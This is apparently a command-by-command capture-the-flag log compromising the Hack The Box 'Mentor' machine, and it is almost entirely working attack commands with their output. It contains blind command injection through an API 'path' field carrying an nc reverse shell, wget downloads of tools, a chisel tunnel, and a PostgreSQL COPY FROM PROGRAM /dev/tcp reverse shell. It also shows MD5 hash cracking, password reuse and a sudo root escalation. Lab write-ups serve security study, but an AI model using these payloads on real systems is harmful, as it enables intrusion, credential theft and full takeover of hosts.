в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ ffuf -u http://10.10.11.193 -H 'Host: FUZZ.mentorquotes.htb' -mc 200,404 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.193
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.mentorquotes.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,404
________________________________________________

api                     [Status: 404, Size: 22, Words: 2, Lines: 1, Duration: 29ms]
:: Progress: [4989/4989] :: Job [1/1] :: 1492 req/sec :: Duration: [0:00:03] :: Errors: 0 ::
                                                                                                                    
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ 


в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u http://api.mentorquotes.htb
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://api.mentorquotes.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 307) [Size: 0] [--> http://api.mentorquotes.htb/admin/]
/docs                 (Status: 200) [Size: 969]
/users                (Status: 307) [Size: 0] [--> http://api.mentorquotes.htb/users/]
/quotes               (Status: 307) [Size: 0] [--> http://api.mentorquotes.htb/quotes/]
/server-status        (Status: 403) [Size: 285]
Progress: 20653 / 26584 (77.69%)[ERROR] parse "http://api.mentorquotes.htb/error\x1f_log": net/url: invalid control character in URL
Progress: 26583 / 26584 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                    
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ 


MentorQuotes

 0.0.1 

OAS3

/openapi.json

Working towards helping people move forward
james - Website
Send email to james
Auth
POST
/auth/login
Login
POST
/auth/signup
Create User
Users
GET
/users/
Get Users
GET
/users/{id}/
Get User By Id
POST
/users/add
Create User
Quotes
GET
/quotes/
Read All Quotes
POST
/quotes/
Create Quote
GET
/quotes/{id}/
Read Quote
PUT
/quotes/{id}/
Update Quote
DELETE
/quotes/{id}/
Delete Quote
Schemas
HTTPValidationError
ValidationError
quoteDB
quoteSchema
userDB
userSchema




iso.3.6.1.2.1.25.4.2.1.5.1933 = ""
iso.3.6.1.2.1.25.4.2.1.5.1934 = ""
iso.3.6.1.2.1.25.4.2.1.5.1990 = STRING: "-proto tcp -host-ip 172.22.0.1 -host-port 81 -container-ip 172.22.0.2 -container-port 80"
iso.3.6.1.2.1.25.4.2.1.5.2004 = STRING: "-namespace moby -id 26d7078bd8eab18a74d629198214cd00189d1f84f8ce21d414326ce155c1c669 -address /run/containerd/containerd.sock"
iso.3.6.1.2.1.25.4.2.1.5.2028 = STRING: "main.py"
iso.3.6.1.2.1.25.4.2.1.5.2067 = STRING: "-c from multiprocessing.semaphore_tracker import main;main(4)"
iso.3.6.1.2.1.25.4.2.1.5.2068 = STRING: "-c from multiprocessing.spawn import spawn_main; spawn_main(tracker_fd=5, pipe_handle=7) --multiprocessing-fork"
iso.3.6.1.2.1.25.4.2.1.5.2090 = ""
iso.3.6.1.2.1.25.4.2.1.5.2091 = ""
iso.3.6.1.2.1.25.4.2.1.5.2131 = STRING: "/usr/local/bin/login.py kj23sadkj123as0-d213"
iso.3.6.1.2.1.25.4.2.1.5.2187 = ""
iso.3.6.1.2.1.25.4.2.1.5.2266 = ""
iso.3.6.1.2.1.25.4.2.1.5.2667 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.222913 = ""
iso.3.6.1.2.1.25.4.2.1.5.222963 = ""
iso.3.6.1.2.1.25.4.2.1.5.222999 = ""
iso.3.6.1.2.1.25.4.2.1.5.223023 = ""
iso.3.6.1.2.1.25.4.2.1.5.223049 = ""
iso.3.6.1.2.1.25.4.2.1.6.1 = INTEGER: 4





в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ curl http://api.mentorquotes.htb/auth/login -X POST -H 'Content-Type: application/json' -d '{"email":"james@mentorquotes.htb", "username":"james","password":"kj23sadkj123as0-d213"}'
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0"                                                                                                                    
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ 


в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ curl http://api.mentorquotes.htb/admin/backup -H 'Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0' -H 'Content-Type:application/json' -X POST -d '{}'
{"detail":[{"loc":["body","path"],"msg":"field required","type":"value_error.missing"}]}                                                                                                                    
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ 

в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ curl http://api.mentorquotes.htb/admin/backup -H 'Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0' -H 'Content-Type:application/json' -X POST -d '{"path":"test"}'
{"INFO":"Done!"}                                                                                                                    
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ 


"The path parameter seems rather interesting, so we try to inject an OS command. Since the endpoint's
responses do not provide any useful output as to the underlying command, this is known as a blind
injection. With that in mind, we set up a Python HTTP server to catch any potential callbacks that will verify
successful command execution."

в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ curl http://api.mentorquotes.htb/admin/backup -H 'Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0' -H 'Content-Type:application/json' -X POST -d '{"path":"$(nc 10.10.14.16 4444 -e /bin/sh)"}'
{"INFO":"Done!"}                                                                                                                    
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ 


в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.193] 35407
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)


в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.193] 35407
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
ls -la
total 24
drwxr-xr-x    1 root     root          4096 Nov 10  2022 .
drwxr-xr-x    1 root     root          4096 Aug 21 02:55 ..
-rw-r--r--    1 root     root          1024 Jun 12  2022 .Dockerfile.swp
-rw-r--r--    1 root     root           522 Nov  3  2022 Dockerfile
drwxr-xr-x    1 root     root          4096 Nov 10  2022 app
-rw-r--r--    1 root     root           672 Jun  4  2022 requirements.txt

ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
11: eth0@if12: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP 
    link/ether 02:42:ac:16:00:03 brd ff:ff:ff:ff:ff:ff
    inet 172.22.0.3/16 brd 172.22.255.255 scope global eth0
       valid_lft forever preferred_lft forever


cd /tmp
wget 10.10.14.38/nmap
chmod +x /tmp/nmap
/tmp/nmap -sn 172.22.0.0/24

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2025-12-08 10:59 GMT
Nmap scan report for 172.22.0.1
Host is up (0.000045s latency).
MAC Address: 02:42:D4:F7:85:87 (Unknown)
Nmap scan report for docker_web_1.docker_vpcbr (172.22.0.2)
Host is up (0.000027s latency).
MAC Address: 02:42:AC:16:00:02 (Unknown)
Nmap scan report for docker_postgres_1.docker_vpcbr (172.22.0.4)
Host is up (0.000014s latency).
MAC Address: 02:42:AC:16:00:04 (Unknown)
Nmap scan report for ed049fda1a46 (172.22.0.3)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 16.71 seconds


/tmp/nmap 172.22.0.4

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2025-12-08 11:00 GMT
Nmap scan report for docker_postgres_1.docker_vpcbr (172.22.0.4)
Host is up (0.000020s latency).
Not shown: 1288 closed ports
PORT     STATE SERVICE
5432/tcp open  postgresql
MAC Address: 02:42:AC:16:00:04 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds



в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# ./chisel server -p 8001 -reverse -v
2025/12/08 10:02:31 server: Reverse tunnelling enabled
2025/12/08 10:02:31 server: Fingerprint T3p36uem1QuAGJpZKCph2j0+iehZvBoAWWqhRQsyiX0=
2025/12/08 10:02:31 server: Listening on http://0.0.0.0:8001


cd /tmp
wget 10.10.14.38/chisel
chmod +x /tmp/chisel
./chisel client 10.10.14.38:8001 R:127.0.0.1:8002:172.22.0.4:5432



2025/12/08 10:03:07 server: session#1: Handshaking with 10.10.11.193:56466...
2025/12/08 10:03:07 server: session#1: Verifying configuration
2025/12/08 10:03:07 server: session#1: tun: Created
2025/12/08 10:03:07 server: session#1: tun: SSH connected
2025/12/08 10:03:07 server: session#1: tun: proxy#R:127.0.0.1:8002=>172.22.0.4:5432: Listening
2025/12/08 10:03:07 server: session#1: tun: Bound proxies



DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);

postgres=# COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/10.10.14.38/53 0>&1"';



в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# nc -lnvp 53  
listening on [any] 53 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.11.193] 38856
bash: cannot set terminal process group (52): Inappropriate ioctl for device
bash: no job control in this shell
postgres@96e44c569292:~/data$ 


postgres@96e44c569292:~/data$ ls -lsa
ls -lsa
total 136
 4 drwx------ 20 postgres postgres  4096 Dec  8 10:53 .
 4 drwxr-xr-x  1 postgres postgres  4096 Nov 11  2022 ..
 4 drwx------  6 postgres postgres  4096 Nov 10  2022 base
 4 drwx------  2 postgres postgres  4096 Dec  8 10:54 global
 4 drwxr-xr-x  2 postgres root      4096 Nov 11  2022 pg_backup
 4 drwx------  2 postgres postgres  4096 Nov 10  2022 pg_commit_ts
 4 drwx------  2 postgres postgres  4096 Nov 10  2022 pg_dynshmem
 8 -rw-------  1 postgres postgres  4782 Jun  8  2022 pg_hba.conf
 4 -rw-------  1 postgres postgres  1636 Jun  8  2022 pg_ident.conf
 4 drwx------  4 postgres postgres  4096 Dec  8 11:13 pg_logical
 4 drwx------  4 postgres postgres  4096 Nov 10  2022 pg_multixact
 4 drwx------  2 postgres postgres  4096 Nov 10  2022 pg_notify
 4 drwx------  2 postgres postgres  4096 Nov 10  2022 pg_replslot
 4 drwx------  2 postgres postgres  4096 Nov 10  2022 pg_serial
 4 drwx------  2 postgres postgres  4096 Nov 10  2022 pg_snapshots
 4 drwx------  2 postgres postgres  4096 Dec  8 10:53 pg_stat
 4 drwx------  2 postgres postgres  4096 Dec  8 11:14 pg_stat_tmp
 4 drwx------  2 postgres postgres  4096 Nov 10  2022 pg_subtrans
 4 drwx------  2 postgres postgres  4096 Nov 10  2022 pg_tblspc
 4 drwx------  2 postgres postgres  4096 Nov 10  2022 pg_twophase
 4 -rw-------  1 postgres postgres     3 Jun  8  2022 PG_VERSION
 4 drwx------  3 postgres postgres  4096 Nov 10  2022 pg_wal
 4 drwx------  2 postgres postgres  4096 Nov 10  2022 pg_xact
 4 -rw-------  1 postgres postgres    88 Jun  8  2022 postgresql.auto.conf
28 -rw-------  1 postgres postgres 28156 Jun  8  2022 postgresql.conf
 4 -rw-------  1 postgres postgres    36 Dec  8 10:53 postmaster.opts
 4 -rw-------  1 postgres postgres    94 Dec  8 10:53 postmaster.pid
postgres@96e44c569292:~/data$ cd pg_backup 
cd pg_backup


postgres@96e44c569292:~/data/pg_backup$ ls
ls
db_export.sql
postgres@96e44c569292:~/data/pg_backup$ cat db_export.sql


COPY public.users (id, email, username, password) FROM stdin;
1	james@mentorquotes.htb	james	7ccdcd8c05b59add9c198d492b36a503
35	svc@mentorquotes.htb	service_acc	53f22d0dfa10dce7e29cd31f4f953fd8
\.





в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hash
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
123meunomeeivani (?)     
1g 0:00:00:00 DONE (2025-12-08 10:17) 1.162g/s 16678Kp/s 16678Kc/s 32171KC/s  fuckyooh21..*7ВЎVamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 
                                                                                                                     
в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# 


в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# ssh svc@10.10.11.193   
...
svc@mentor:~$ 

svc@mentor:~$ cat /etc/snmp/snmpd.conf
...
createUser bootstrap MD5 SuperSecurePassword123__ DES
rouser bootstrap priv
...

svc@mentor:~$ su james
Password: 
james@mentor:/home/svc$ 


james@mentor:/home/svc$ sudo -l
Matching Defaults entries for james on mentor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User james may run the following commands on mentor:
    (ALL) /bin/sh
james@mentor:/home/svc$ 


james@mentor:/home/svc$ sudo /bin/sh -p
# id
uid=0(root) gid=0(root) groups=0(root)












